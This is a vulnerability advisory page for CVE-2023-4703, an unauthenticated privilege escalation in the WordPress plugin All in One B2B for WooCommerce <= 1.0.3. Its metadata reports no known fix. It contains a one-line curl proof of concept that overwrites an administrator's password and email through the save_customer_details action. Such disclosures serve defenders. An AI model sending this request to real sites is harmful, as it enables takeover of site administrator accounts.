All in One B2B for WooCommerce <= 1.0.3 – Unauthenticated Privilege Escalation | CVE 2023-4703 | Plugin Vulnerabilities

Description

The plugin does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.

Proof of Concept

curl 'https://example.com/' -d 'action=save_customer_details&customer_id=ADMIN_USER_ID&customer_password=NEW_PASSWORD&customer_email=ADMIN_EMAIL&customer_display_name=Foo'

Affects Plugins

all-in-one-b2b-for-woocommerce

No known fix

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Alexander Concha

Verified

Yes

WPVDB ID

83278bbb-90e6-4465-a46d-60b4c703c11a

Timeline

Publicly Published

2023-09-04 (about 8 months ago)

Added

2023-09-04 (about 8 months ago)

Last Updated

2023-09-04 (about 8 months ago)

Other

Published

Title

Published

2020-01-13

Title

Ultimate Member < 2.1.3 - Insecure Direct Object Reference (IDOR)

Published

2019-08-07

Title

Login Or Logout Menu Item < 1.2.0 - Unauthenticated Options Change

Published

2020-03-11

Title

MStore API < 2.1.6 - Unauthenticated Arbitrary Account Creation/Edition

Published

2024-04-25

Title

WooCommerce Amazon Affiliates - Wordpress Plugin <= 14.0.10 - Authenticated (Subscriber+) Privilege Escalation

Published

2023-11-14

Title

Thrive Theme Builder < 3.24.0 - Subscriber+ Privilege Escalation